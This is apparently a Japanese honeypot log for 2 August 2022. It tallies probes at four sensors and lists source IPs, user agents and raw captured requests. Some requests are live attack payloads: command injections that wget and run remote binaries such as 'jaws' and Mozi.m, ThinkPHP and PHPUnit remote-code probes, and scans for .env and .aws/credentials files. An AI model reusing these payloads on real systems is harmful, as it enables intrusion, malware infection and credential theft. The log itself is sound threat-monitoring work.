ハニーポット(仮) 観測記録 2022/08/02分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
Location:JP
curlによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget rischyo.cf/jaws; sh /tmp/jaws
Location:US
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
Gh0stRATのような動き
を確認しました。
Location:UK
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.awsへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:SG
D-link製品の脆弱性を狙うアクセス
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:226 (前日比:139)
US:総アクセス数:80 (前日比:3)
UK:総アクセス数:43 (前日比:-15)
SG:総アクセス数:70 (前日比:5)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 20.38.2.237 | United States |
4 | 23.225.163.211 | United States |
127 | 35.90.54.60 | United States |
1 | 45.148.10.81 | Romania |
1 | 45.153.241.153 | Germany |
2 | 52.207.183.2 | United States |
1 | 54.153.76.79 | United States |
1 | 69.162.231.221 | United States |
15 | 95.214.235.205 | Ukraine |
22 | 104.156.155.29 | United States |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.123 | Russia |
1 | 120.244.202.83 | China |
8 | 135.125.217.54 | France |
7 | 135.125.246.189 | France |
4 | 141.98.6.62 | Bulgaria |
1 | 143.198.97.178 | United States |
1 | 163.123.143.71 | United States |
8 | 171.22.30.52 | Bulgaria |
2 | 179.43.155.171 | Panama |
10 | 185.7.214.104 | Hong Kong |
1 | 185.100.87.136 | Seychelles |
1 | 192.241.220.209 | United States |
1 | 192.241.221.11 | United States |
1 | 198.235.24.10 | United States |
1 | 203.122.46.146 | India |
UserAgent一覧
件数 | UserAgent |
---|---|
15 | - |
4 | Go-http-client/1.1 |
6 | Mozila/5.0 |
4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 |
37 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
11 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
15 | curl/7.54.0 |
118 | python-requests/2.28.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | MGLNDD_18.179.20.5_80\n |
||
2 | \x16\x03\x01\x01D\x01 |
||
6 | \x16\x03\x01\x02 |
||
3 | \x16\x03\x01 |
||
1 | CONNECT | kyfw[.]12306[.]cn:443 |
HTTP/1.0 |
1 | GET | /.env.bak |
HTTP/1.1 |
1 | GET | /.env.save |
HTTP/1.1 |
38 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | //.aws/credentials |
HTTP/1.1 |
1 | GET | //.env.bak |
HTTP/1.1 |
1 | GET | //.git/config |
HTTP/1.1 |
1 | GET | //_profiler/phpinfo/info.php |
HTTP/1.1 |
1 | GET | //_profiler/phpinfo/phpinfo.php |
HTTP/1.1 |
1 | GET | //_profiler/phpinfo |
HTTP/1.1 |
1 | GET | // |
HTTP/1.1 |
1 | GET | //access/info.php |
HTTP/1.1 |
1 | GET | //access/infophp.php |
HTTP/1.1 |
1 | GET | //access/phpinfo.php |
HTTP/1.1 |
1 | GET | //access/phpinfo |
HTTP/1.1 |
1 | GET | //account/info.php |
HTTP/1.1 |
1 | GET | //account/infophp.php |
HTTP/1.1 |
1 | GET | //account/phpinfo.php |
HTTP/1.1 |
1 | GET | //account/phpinfo |
HTTP/1.1 |
1 | GET | //admin/info.php |
HTTP/1.1 |
1 | GET | //admin/infophp.php |
HTTP/1.1 |
1 | GET | //admin/phpinfo.html |
HTTP/1.1 |
1 | GET | //admin/phpinfo.php |
HTTP/1.1 |
1 | GET | //admin/phpinfo |
HTTP/1.1 |
1 | GET | //admin_php[.]php/infophp.php |
HTTP/1.1 |
1 | GET | //apache/i.php |
HTTP/1.1 |
1 | GET | //apache/info.php |
HTTP/1.1 |
1 | GET | //apache/phpinfo.php |
HTTP/1.1 |
1 | GET | //apache2[.]php |
HTTP/1.1 |
1 | GET | //apache[.]php |
HTTP/1.1 |
1 | GET | //aws[.]yml |
HTTP/1.1 |
1 | GET | //backend/.env |
HTTP/1.1 |
1 | GET | //config[.]js |
HTTP/1.1 |
1 | GET | //console/info.php |
HTTP/1.1 |
1 | GET | //console/infophp |
HTTP/1.1 |
1 | GET | //console/phpinfo.html |
HTTP/1.1 |
1 | GET | //console/phpinfo.php |
HTTP/1.1 |
1 | GET | //console/phpinfo |
HTTP/1.1 |
1 | GET | //dashboard/i.php |
HTTP/1.1 |
1 | GET | //dashboard/info.php |
HTTP/1.1 |
1 | GET | //dashboard/infophp.php |
HTTP/1.1 |
2 | GET | //dashboard/phpinfo.php |
HTTP/1.1 |
1 | GET | //dashboard/phpinfo |
HTTP/1.1 |
1 | GET | //dashboard/test.php |
HTTP/1.1 |
1 | GET | //debug/default/view?panel=config |
HTTP/1.1 |
1 | GET | //dep[.]php |
HTTP/1.1 |
1 | GET | //deploy[.]php |
HTTP/1.1 |
1 | GET | //dev/.env |
HTTP/1.1 |
2 | GET | //dev[.]php |
HTTP/1.1 |
1 | GET | //developer[.]php |
HTTP/1.1 |
1 | GET | //devs[.]php |
HTTP/1.1 |
1 | GET | //env/info.php |
HTTP/1.1 |
1 | GET | //env/infophp |
HTTP/1.1 |
1 | GET | //env/phpinfo.php |
HTTP/1.1 |
1 | GET | //env/phpinfo |
HTTP/1.1 |
1 | GET | //environment/info.php |
HTTP/1.1 |
1 | GET | //environment/infophp.php |
HTTP/1.1 |
1 | GET | //environment/phpinfo.php |
HTTP/1.1 |
1 | GET | //environment/phpinfo |
HTTP/1.1 |
1 | GET | //frontend_dev[.]php/$ |
HTTP/1.1 |
1 | GET | //i[.]php |
HTTP/1.1 |
1 | GET | //in[.]php |
HTTP/1.1 |
1 | GET | //index/info.php |
HTTP/1.1 |
1 | GET | //index/infophp.php |
HTTP/1.1 |
1 | GET | //index/phpinfo.php |
HTTP/1.1 |
1 | GET | //index/phpinfo |
HTTP/1.1 |
1 | GET | //index1[.]php |
HTTP/1.1 |
1 | GET | //index[.]php |
HTTP/1.1 |
1 | GET | //inf[.]php |
HTTP/1.1 |
1 | GET | //info/info.php |
HTTP/1.1 |
1 | GET | //info/infophp.php |
HTTP/1.1 |
1 | GET | //info/phpinfo.php |
HTTP/1.1 |
1 | GET | //info/phpinfo |
HTTP/1.1 |
1 | GET | //info1[.]php |
HTTP/1.1 |
1 | GET | //info2[.]php |
HTTP/1.1 |
1 | GET | //info3[.]php |
HTTP/1.1 |
1 | GET | //info4[.]php |
HTTP/1.1 |
2 | GET | //info[.]php |
HTTP/1.1 |
1 | GET | //infophp[.]php |
HTTP/1.1 |
1 | GET | //infos[.]php |
HTTP/1.1 |
1 | GET | //ini[.]php |
HTTP/1.1 |
1 | GET | //live/.env |
HTTP/1.1 |
1 | GET | //o[.]php |
HTTP/1.1 |
1 | GET | //ocp[.]php |
HTTP/1.1 |
1 | GET | //p[.]php |
HTTP/1.1 |
1 | GET | //php-info.php |
HTTP/1.1 |
1 | GET | //php/phpinfo.php |
HTTP/1.1 |
1 | GET | //php1[.]php |
HTTP/1.1 |
1 | GET | //php[.]php |
HTTP/1.1 |
1 | GET | //php_info[.]php |
HTTP/1.1 |
1 | GET | //phpinfo/info.php |
HTTP/1.1 |
1 | GET | //phpinfo/phpinfo.php |
HTTP/1.1 |
1 | GET | //phpinfo1[.]php |
HTTP/1.1 |
1 | GET | //phpinfo2[.]php |
HTTP/1.1 |
1 | GET | //phpinfo3[.]php |
HTTP/1.1 |
1 | GET | //phpinfo4[.]php |
HTTP/1.1 |
2 | GET | //phpinfo[.]html |
HTTP/1.1 |
2 | GET | //phpinfo[.]php |
HTTP/1.1 |
1 | GET | //phpinfo[.]txt |
HTTP/1.1 |
1 | GET | //phpinfo |
HTTP/1.1 |
1 | GET | //phpinfodev[.]php |
HTTP/1.1 |
1 | GET | //phpinfos[.]php |
HTTP/1.1 |
1 | GET | //phpsysinfo/info.php |
HTTP/1.1 |
1 | GET | //phpsysinfo/phpinfo.php |
HTTP/1.1 |
1 | GET | //phpsysinfo/phpsysinfo.php |
HTTP/1.1 |
1 | GET | //phpsysinfo[.]php |
HTTP/1.1 |
1 | GET | //phpsysinfo |
HTTP/1.1 |
1 | GET | //phptest[.]php |
HTTP/1.1 |
1 | GET | //pinfo[.]php |
HTTP/1.1 |
1 | GET | //rest[.]php |
HTTP/1.1 |
1 | GET | //root/info.php |
HTTP/1.1 |
1 | GET | //root/infophp.php |
HTTP/1.1 |
1 | GET | //root/phpinfo.html |
HTTP/1.1 |
1 | GET | //root/phpinfo.php |
HTTP/1.1 |
1 | GET | //root/phpinfo |
HTTP/1.1 |
1 | GET | //staging/.env |
HTTP/1.1 |
1 | GET | //test0[.]php |
HTTP/1.1 |
1 | GET | //test1[.]php |
HTTP/1.1 |
1 | GET | //test1 |
HTTP/1.1 |
1 | GET | //test2[.]php |
HTTP/1.1 |
1 | GET | //test3[.]php |
HTTP/1.1 |
1 | GET | //test4[.]php |
HTTP/1.1 |
1 | GET | //test[.]php |
HTTP/1.1 |
1 | GET | //token[.]php |
HTTP/1.1 |
1 | GET | //tools/info.php |
HTTP/1.1 |
1 | GET | //tools/infophp.php |
HTTP/1.1 |
1 | GET | //tools/phpinfo.php |
HTTP/1.1 |
1 | GET | //tools/phpinfo |
HTTP/1.1 |
1 | GET | //tz[.]php |
HTTP/1.1 |
1 | GET | //web[.]php |
HTTP/1.1 |
1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /?pp=env |
HTTP/1.1 |
1 | GET | /CSS/Miniweb.css |
HTTP/1.1 |
1 | GET | /JUVg |
HTTP/1.1 |
1 | GET | /Portal/Portal.mwsl |
HTTP/1.1 |
1 | GET | /Portal0000.htm |
HTTP/1.1 |
1 | GET | /__Additional |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /config.js |
HTTP/1.1 |
1 | GET | /config.json |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /localstart.jsa |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /nmaplowercheck1659295252 |
HTTP/1.1 |
1 | GET | /pools/default/buckets |
HTTP/1.1 |
1 | GET | /pools |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /server-status |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws |
|
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
1 | OPTIONS | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /scripts/WPnBr.dll |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 38.68.52.126 | United States |
2 | 45.227.254.48 | Belize |
10 | 51.79.29.48 | Canada |
1 | 54.151.107.142 | United States |
1 | 66.240.205.34 | United States |
1 | 77.83.36.40 | Ukraine |
1 | 89.45.4.150 | Romania |
1 | 103.41.24.100 | India |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.38 | Russia |
2 | 109.237.103.123 | Russia |
1 | 116.27.212.175 | China |
1 | 137.184.33.230 | United States |
2 | 141.98.6.62 | Bulgaria |
1 | 141.98.6.162 | Bulgaria |
1 | 143.198.97.178 | United States |
1 | 147.182.255.203 | United States |
1 | 150.136.32.247 | United States |
1 | 162.142.125.10 | United States |
1 | 162.142.125.221 | United States |
2 | 163.123.143.71 | United States |
1 | 164.92.85.208 | United States |
1 | 167.94.138.117 | United States |
1 | 167.248.133.45 | United States |
1 | 167.248.133.117 | United States |
1 | 171.22.30.42 | Bulgaria |
1 | 172.104.242.173 | United States |
2 | 179.43.154.206 | Panama |
16 | 185.7.214.104 | Hong Kong |
4 | 185.23.182.110 | Hong Kong |
1 | 185.44.76.187 | United Kingdom |
9 | 185.254.196.223 | Ukraine |
1 | 192.241.220.189 | United States |
4 | 198.20.87.98 | United States |
1 | 198.199.95.17 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
19 | - |
3 | Go-http-client/1.1 |
1 | Mozila/5.0 |
2 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 |
16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
29 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01C\x01 |
||
2 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01 |
||
29 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | //prototype/.env |
HTTP/1.1 |
1 | GET | //staging/.env |
HTTP/1.1 |
1 | GET | /0bef |
HTTP/1.0 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
2 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /HNAP1/ |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
2 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
2 | GET | /sitemap.xml |
HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//dyn[.]epicgifs[.]net/test6956.php |
HTTP/1.1 |
1 | OPTIONS | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
5 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 20.226.59.136 | United States |
4 | 27.124.32.177 | Singapore |
1 | 35.82.32.181 | United States |
1 | 66.240.192.82 | United States |
2 | 94.23.14.201 | France |
1 | 107.182.129.137 | United States |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.38 | Russia |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
1 | 114.228.35.186 | China |
1 | 141.98.6.162 | Bulgaria |
1 | 141.145.199.222 | United States |
2 | 163.123.143.71 | United States |
1 | 164.92.113.92 | United States |
1 | 167.94.146.57 | United States |
1 | 172.104.242.173 | United States |
1 | 178.60.27.186 | Spain |
9 | 185.7.214.104 | Hong Kong |
1 | 192.241.213.50 | United States |
1 | 192.241.214.12 | United States |
1 | 192.241.214.208 | United States |
1 | 192.241.219.54 | United States |
2 | 194.165.16.76 | Panama |
1 | 205.210.31.22 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
16 | - |
3 | Go-http-client/1.1 |
1 | Mozila/5.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
6 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01C\x01 |
||
3 | \x16\x03\x01\x01D\x01 |
||
4 | \x16\x03\x01 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
6 | GET | /.env |
HTTP/1.1 |
1 | GET | /0bef |
HTTP/1.0 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php |
HTTP/1.1 |
1 | GET | /phpmyadmin/index.php |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//114[.]228[.]35[.]186:51669/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | OPTIONS | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 13.52.217.137 | United States |
4 | 23.224.186.230 | United States |
1 | 34.207.127.1 | United States |
1 | 45.148.10.81 | Romania |
10 | 51.79.29.48 | Canada |
1 | 69.162.231.221 | United States |
2 | 94.23.14.201 | France |
2 | 107.172.100.220 | United States |
1 | 107.182.129.137 | United States |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
1 | 120.244.202.83 | China |
3 | 128.199.83.90 | United Kingdom |
2 | 138.197.183.239 | United States |
4 | 141.98.6.62 | Bulgaria |
1 | 141.98.6.162 | Bulgaria |
3 | 163.123.143.71 | United States |
1 | 167.94.138.119 | United States |
1 | 172.104.242.173 | United States |
1 | 172.105.77.209 | United States |
1 | 172.105.89.161 | United States |
10 | 185.7.214.104 | Hong Kong |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.201.89 | United States |
1 | 192.241.206.57 | United States |
1 | 192.241.222.172 | United States |
2 | 194.165.16.37 | Panama |
1 | 200.110.48.18 | Bolivia |
1 | 205.210.31.32 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
17 | - |
4 | Go-http-client/1.1 |
1 | Mozila/5.0 |
4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
1 | Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
23 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | MGLNDD_13.67.44.234_80 |
||
2 | \x03 |
||
2 | \x16\x03\x01\x01D\x01 |
||
4 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
1 | CONNECT | kyfw[.]12306[.]cn:443 |
HTTP/1.0 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
20 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | //backend/.env |
HTTP/1.1 |
1 | GET | //dev/.env |
HTTP/1.1 |
1 | GET | //live/.env |
HTTP/1.1 |
1 | GET | //staging/.env |
HTTP/1.1 |
1 | GET | /0bef |
HTTP/1.0 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /blog/.env |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php |
HTTP/1.1 |
2 | GET | /phpmyadmin/index.php |
HTTP/1.1 |
1 | GET | /phpmyadmin4.8.5/index.php |
HTTP/1.1 |
1 | GET | /pmd/index.php |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
1 | OPTIONS | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |